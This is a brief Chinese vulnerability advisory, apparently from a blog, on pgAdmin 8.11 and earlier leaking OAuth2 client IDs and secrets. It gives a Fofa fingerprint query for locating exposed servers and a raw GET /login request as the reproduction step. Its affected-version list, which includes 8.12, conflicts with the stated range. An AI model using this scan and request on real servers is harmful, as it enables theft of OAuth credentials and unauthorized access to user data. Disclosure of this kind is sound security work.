0x01 产品描述:
pgAdmin是全球最先进的开源数据库Postgres的领先开源管理工具。 pgAdmin 4旨在满足新手和经验丰富的Postgres用户的需求,提供了强大的图形界面,可简化数据库对象的创建,维护和使用。其可以在Linux,Unix,macOS和Windows上使用,以管理PostgreSQL和EDB Advanced Server 9.5及更高版本
0x02 漏洞描述:
pgAdmin 8.11 及更早版本存在 OAuth2 身份验证安全漏洞。此漏洞允许攻击者获取客户端 ID 和密钥,从而导致未经授权访问用户数据
0x03 影响版本:
pgAdmin4 8.9-3.fc40
pgAdmin4 8.12-1.fc41
0x04 搜索语句:
Fofa:icon_hash="1502815117"
0x05 漏洞复现:
GET /login?next=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip
0x06 修复建议:
官网已在最新版本修复该问题,请即时修复
标签:9014,27,601.1,pgAdmin,2024,漏洞,版本,pgadmin4,Postgres From: https://blog.csdn.net/xc_214/article/details/142781057